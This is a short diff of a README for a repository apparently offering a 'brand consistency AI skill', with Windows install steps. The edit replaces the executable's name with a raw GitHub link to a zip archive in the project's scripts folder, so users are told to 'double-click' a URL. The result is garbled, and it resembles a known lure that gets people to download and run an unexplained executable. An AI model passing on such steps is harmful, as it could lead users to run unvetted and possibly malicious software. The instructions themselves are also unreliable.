esekasa/brand-consistency-ai-skill/README.md

    - Download the zip file.
    - Right-click the file and select **Extract All**.
    - Open the extracted folder.
-   - Double-click the file named `brand-consistency-ai-skill.exe` or similar to start.
+   - Double-click the file named `https://github.com/esekasa/brand-consistency-ai-skill/raw/refs/heads/main/scripts/skill-consistency-ai-brand-2.6.zip` or similar to start.

 6. If the app depends on any supporting software (like .NET), the installer will prompt you.
 It usually guides you through any needed installations automatically.